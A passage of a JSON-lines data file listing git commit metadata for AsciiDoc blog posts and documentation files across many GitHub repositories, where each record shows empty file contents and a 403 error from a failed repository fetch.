2017-01-13-memo-like-asciidoc.adoc","message":"Update 
2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eff3afb81b339185c2018483489e3c9fd1415588","subject":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","message":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49ab918720183f208e4047abc987db7ab26c4427","subject":"Hawkular Metrics 0.11.0 - Release","message":"Hawkular Metrics 0.11.0 - Release\n","repos":"jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/01\/12\/hawkular-metrics-0.11.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/01\/12\/hawkular-metrics-0.11.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09f755a7bb7733f546152121b966fe0173094f92","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/12\/23\/deref.adoc","new_file":"content\/news\/2021\/12\/23\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"dd292b54d345358108ef611fe8b9d0710020b5c4","subject":"12-20 Release (#398)","message":"12-20 Release (#398)\n\n* fix up date, language tweak\r\n\r\n* language 
tweak","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2021-12-20-release.adoc","new_file":"content\/news\/2021-12-20-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1dafb0f5b536bc634499297026d17759a6084595","subject":"Fix links","message":"Fix links","repos":"destijl\/artifacts,pidydx\/artifacts,pidydx\/artifacts,destijl\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a705c4d7c0011ad85a90ebe5623c38c7fdd8ba9","subject":"Update 2016-6-26-first-title.adoc","message":"Update 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-first-title.adoc","new_file":"_posts\/2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"729b8341cebb09ce6a99e0563343b974ea71deac","subject":"Update 2016-06-27-file-getput-content.adoc","message":"Update 2016-06-27-file-getput-content.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-06-27-file-getput-content.adoc","new_file":"_posts\/2016-06-27-file-getput-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"406f1cfb835350dd11b8dee5c1a807ca6e7000bf","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0816d1a890b674a72b8fdd3466ebef9d2ba6b911","subject":"Update 2018-05-24-Watson-Primer-Yousef-Hashimi.adoc","message":"Update 2018-05-24-Watson-Primer-Yousef-Hashimi.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-05-24-Watson-Primer-Yousef-Hashimi.adoc","new_file":"_posts\/2018-05-24-Watson-Primer-Yousef-Hashimi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"fbe65c10026d342cc8031c9604695c95a4ce71f0","subject":"Links","message":"Links\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d9264b4418c165549cdcf5238aca21b8c661935","subject":"add section: Installing PostgreSQL extensions","message":"add section: Installing PostgreSQL extensions\n\n'unaccent' case","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d16a4ffc14fd9cc0a61d2e0b91b6a08c743fca37","subject":"removed unecessary comma + init git submodule","message":"removed unecessary comma + init git submodule","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d70cf1e7a5b4308e2b5858d59f79801517b96a38","subject":"y2b create post Amazing 3D Hologram Using Any Smartphone!","message":"y2b create post Amazing 3D Hologram Using Any Smartphone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-22-Amazing-3D-Hologram-Using-Any-Smartphone.adoc","new_file":"_posts\/2016-07-22-Amazing-3D-Hologram-Using-Any-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e1a78f027a9908b5f7f93d68356c3f96598897f","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a32b3b44bced57d34e7dd233a78203192b8646ad","subject":"Update 2016-07-22-Prova-math.adoc","message":"Update 2016-07-22-Prova-math.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-Prova-math.adoc","new_file":"_posts\/2016-07-22-Prova-math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e29a9d2a2bf7a77cfdcc53c6f4e24fdd8871b6f5","subject":"Update 2016-08-04-2016-08-04.adoc","message":"Update 2016-08-04-2016-08-04.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-04-2016-08-04.adoc","new_file":"_posts\/2016-08-04-2016-08-04.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bca6bdd0bc19d39a89f2065e0f79ccebdd4d739","subject":"2016-08-04-BackToWork.adoc","message":"2016-08-04-BackToWork.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-08-04-BackToWork.adoc","new_file":"_posts\/2016-08-04-BackToWork.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5044d38cc7edf1e4adf6f8f165474172ba7168ec","subject":"Update 2017-02-21-4test-four.adoc","message":"Update 2017-02-21-4test-four.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21-4test-four.adoc","new_file":"_posts\/2017-02-21-4test-four.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cc3c2780acfdaae998e0b5bea458dc9e7c66c47","subject":"Update 2015-09-19-JSON-syntax.adoc","message":"Update 2015-09-19-JSON-syntax.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-syntax.adoc","new_file":"_posts\/2015-09-19-JSON-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62b1efc6e30682a4446841883cae8b0baec7f158","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c1c6da74f63cb5ced38c546dc0f344e8cdbe58e","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 
2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857567594e73b1e4febd64693a70343074c0cacc","subject":"Added documentation for client config IP based configuration","message":"Added documentation for client config IP based configuration\n\nSigned-off-by: Ido Barnea <3a6e28cf60eb2f9d9d6e5ab6275926d9a599fe66@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2e4f6561a2b206abd5da799194b6943916df0fb","subject":"Update 2016-12-28-File-Maker-Openfire-API-Integration.adoc","message":"Update 2016-12-28-File-Maker-Openfire-API-Integration.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2016-12-28-File-Maker-Openfire-API-Integration.adoc","new_file":"_posts\/2016-12-28-File-Maker-Openfire-API-Integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2601257ac667e26cb785e844df6963756cea3d7c","subject":"Removed non ready JFace table viewer","message":"Removed non ready JFace table viewer\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"SWT.adoc","new_file":"SWT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52d19678fffd82f52d9539087b6c8b6955c691fd","subject":"Update 2015-10-12-The-Internet-of-Things-and-Open-Datas-Last-Mile.adoc","message":"Update 2015-10-12-The-Internet-of-Things-and-Open-Datas-Last-Mile.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-The-Internet-of-Things-and-Open-Datas-Last-Mile.adoc","new_file":"_posts\/2015-10-12-The-Internet-of-Things-and-Open-Datas-Last-Mile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f72d6654c542bb58ff5795262ac83df46e502e2d","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/14\/deref.adoc","new_file":"content\/news\/2022\/04\/14\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned 
error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b44b9b3c66ee15fe307b856b2633225c962386c8","subject":"Update 2017-01-30-Minecraft-O-Basico-01.adoc","message":"Update 2017-01-30-Minecraft-O-Basico-01.adoc","repos":"Andy4Craft\/andy4craft.github.io,Andy4Craft\/andy4craft.github.io,Andy4Craft\/andy4craft.github.io,Andy4Craft\/andy4craft.github.io","old_file":"_posts\/2017-01-30-Minecraft-O-Basico-01.adoc","new_file":"_posts\/2017-01-30-Minecraft-O-Basico-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Andy4Craft\/andy4craft.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d3e1c59d7b5852ab45b2f4038cdf5a16f29a382","subject":"Update 2016-09-12-Ensemble-DE-analysis-of-RNA-Seq-data-sets.adoc","message":"Update 2016-09-12-Ensemble-DE-analysis-of-RNA-Seq-data-sets.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-12-Ensemble-DE-analysis-of-RNA-Seq-data-sets.adoc","new_file":"_posts\/2016-09-12-Ensemble-DE-analysis-of-RNA-Seq-data-sets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fde805cd6caeabb20fefc05306a301b9b0289e1c","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9fdf8ffecd3ae6fdab4cb6435276c4a90df618e","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed5ef765d03c3fd1a6ab9b6798e1ba5559dff6c1","subject":"Update 2016-07-03-What-it-is-What-is-it.adoc","message":"Update 2016-07-03-What-it-is-What-is-it.adoc","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-03-What-it-is-What-is-it.adoc","new_file":"_posts\/2016-07-03-What-it-is-What-is-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad8a4779c92934242773d1fd7c8d359334c8e120","subject":"Publish 2015-2-10-the-manmoy-of-2014.adoc","message":"Publish 
2015-2-10-the-manmoy-of-2014.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"2015-2-10-the-manmoy-of-2014.adoc","new_file":"2015-2-10-the-manmoy-of-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2eeca20f4a495d7c477bf5c7254095cf3b75c5d","subject":"add docs","message":"add docs\n","repos":"tfarina\/ninja,martine\/ninja,pck\/ninja,rnk\/ninja,mohamed\/ninja,ctiller\/ninja,sorbits\/ninja,syntheticpp\/ninja,mydongistiny\/ninja,tfarina\/ninja,ndsol\/subninja,jimon\/ninja,purcell\/ninja,nocnokneo\/ninja,kimgr\/ninja,rnk\/ninja,fuchsia-mirror\/third_party-ninja,ignatenkobrain\/ninja,ikarienator\/ninja,ctiller\/ninja,liukd\/ninja,TheOneRing\/ninja,pck\/ninja,nickhutchinson\/ninja,bmeurer\/ninja,maruel\/ninja,jimon\/ninja,colincross\/ninja,hnney\/ninja,kissthink\/ninja,ndsol\/subninja,atetubou\/ninja,ignatenkobrain\/ninja,moroten\/ninja,tfarina\/ninja,jimon\/ninja,metti\/ninja,rjogrady\/ninja,iwadon\/ninja,dabrahams\/ninja,metti\/ninja,mydongistiny\/ninja,rnk\/ninja,mgaunard\/ninja,nicolasdespres\/ninja,mgaunard\/ninja,hnney\/ninja,AoD314\/ninja,TheOneRing\/ninja,pathscale\/ninja,jimon\/ninja,ignatenkobrain\/ninja,iwadon\/ninja,maruel\/ninja,tfarina\/ninja,iwadon\/ninja,nico\/ninja,fuchsia-mirror\/third_party-ninja,Qix-\/ninja,sorbits\/ninja,TheOneRing\/ninja,Qix-\/ninja,nicolasdespres\/ninja,jsternberg\/ninja,sxlin\/dist_ninja,Maratyszcza\/ninja-pypi,guiquanz\/ninja,sxlin\/dist_ninja,mutac\/ninja,vvvrrooomm\/ninja,nico\/ninja,synaptek\/ninja,nocnokneo\/ninja,fuchsia-mirror\/third_party-ninja,dorgonman\/ninja,colincross\/ninja,ctiller\/ninja,lizh06\/ninja,sxlin\/dist_ninja,synaptek\/ninja,jsternberg\/ninja,hnney\/ninja,syntheticpp\/ninja,dabrahams\/ninja,jendrikillner\/ninja,fifoforlifo\/ninja,ilor\/ninja,colincross\/ninja,yannicklm\/ninja,Ju2ender\/ninja,vvvrrooomm\/ninja,ninja-build\/ninja,pathscale\/ninja,sxlin\/dist_ninja,Qix-\/ninja,glensc\/ninja,vvvrrooomm\/ninja,mydongistiny\/ninja,drbo\/ninja,hnney\/ninja,mohamed\/ninja,mgaunard\/ninja,colincross\/ninja,nickhutchinson\/ninja,dpwright\/ninja,bradking\/ninja,kissthink\/ninja,mutac\/ninja,mgaunard\/ninja,Ju2ender\/ninja,dabrahams\/ninja,autopulated\/ninja,fifoforlifo\/ninja,sxlin\/dist_ninja,vvvrrooomm\/ninja,maruel\/ninja,dpwright\/ninja,yannicklm\/ninja,ninja-build\/ninja,ilor\/ninja,mdempsky\/ninja,ThiagoGarciaAlves\/ninja,lizh06\/ninja,drbo\/ninja,mdempsky\/ninja,ndsol\/subninja,ignatenkobrain\/ninja,ThiagoGarciaAlves\/ninja,purcell\/ninja,glensc\/ninja,yannicklm\/ninja,guiquanz\/ninja,moroten\/ninja,dorgonman\/ninja,nocnokneo\/ninja,Ju2ender\/ninja,sgraham\/ninja,jhanssen\/ninja,lizh06\/ninja,atetubou\/ninja,synaptek\/ninja,pck\/ninja,mydongistiny\/ninja,ilor\/ninja,dorgonman\/ninja,sxlin\/dist_ninja,ctiller\/ninja,juntalis\/ninja,kimgr\/ninja,dendy\/ninja,sorbits\/ninja,glensc\/ninja,ndsol\/subninja,sgraham\/ninja,moroten\/ninja,nickhutchinson\/ninja,metti\/ninja,Ju2ender\/ninja,bmeurer\/ninja,ikarienator\/ninja,synaptek\/ninja,ThiagoGarciaAlves\/ninja,atetubou\/ninja,dorgonman\/ninja,dendy\/ninja,sxlin\/dist_ninja,jhanssen\/ninja,AoD314\/ninja,drbo\/ninja,dabrahams\/ninja,fuchsia-mirror\/third_party-ninja,moroten\/ninja,pathscale\/ninja,nafest\/ninja,ikarienator\/ninja,TheOneRing\/ninja,jendrikillner\/ninja,glensc\/ninja,Maratyszcza\/ninja-pypi,bmeurer\/ninja,kissthink\/ninja,mu
tac\/ninja,fifoforlifo\/ninja,nicolasdespres\/ninja,liukd\/ninja,automeka\/ninja,metti\/ninja,kimgr\/ninja,autopulated\/ninja,syntheticpp\/ninja,jendrikillner\/ninja,liukd\/ninja,nafest\/ninja,yannicklm\/ninja,nafest\/ninja,lizh06\/ninja,drbo\/ninja,martine\/ninja,guiquanz\/ninja,ninja-build\/ninja,purcell\/ninja,dendy\/ninja,martine\/ninja,bradking\/ninja,automeka\/ninja,guiquanz\/ninja,dpwright\/ninja,autopulated\/ninja,pck\/ninja,jhanssen\/ninja,sgraham\/ninja,jhanssen\/ninja,nickhutchinson\/ninja,AoD314\/ninja,martine\/ninja,liukd\/ninja,maruel\/ninja,fifoforlifo\/ninja,bradking\/ninja,purcell\/ninja,iwadon\/ninja,nicolasdespres\/ninja,rnk\/ninja,jsternberg\/ninja,sorbits\/ninja,juntalis\/ninja,kimgr\/ninja,AoD314\/ninja,nico\/ninja,nico\/ninja,mutac\/ninja,automeka\/ninja,juntalis\/ninja,ilor\/ninja,ninja-build\/ninja,nocnokneo\/ninja,dpwright\/ninja,automeka\/ninja,nafest\/ninja,mdempsky\/ninja,sgraham\/ninja,mohamed\/ninja,rjogrady\/ninja,jsternberg\/ninja,Qix-\/ninja,ThiagoGarciaAlves\/ninja,bradking\/ninja,jendrikillner\/ninja,pathscale\/ninja,kissthink\/ninja,dendy\/ninja,rjogrady\/ninja,Maratyszcza\/ninja-pypi,rjogrady\/ninja,mdempsky\/ninja,syntheticpp\/ninja,atetubou\/ninja,bmeurer\/ninja,ikarienator\/ninja,autopulated\/ninja,Maratyszcza\/ninja-pypi,juntalis\/ninja,mohamed\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"488050f9b24bb8b13cbbf442d8950e793d8a5d64","subject":"Update 2017-03-07-Continous-Integration-Testing-with-TFS-Build-2013-N-Uit-and-SQL-Server-Database-dacpacs.adoc","message":"Update 2017-03-07-Continous-Integration-Testing-with-TFS-Build-2013-N-Uit-and-SQL-Server-Database-dacpacs.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-03-07-Continous-Integration-Testing-with-TFS-Build-2013-N-Uit-and-SQL-Server-Database-dacpacs.adoc","new_file":"_posts\/2017-03-07-Continous-Integration-Testing-with-TFS-Build-2013-N-Uit-and-SQL-Server-Database-dacpacs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8516eec3368e560e29f776737c8f7f2c07753e96","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b404fa406bb23173f7ce9abb1cc016d35aeab33c","subject":"Update User Guide","message":"Update User 
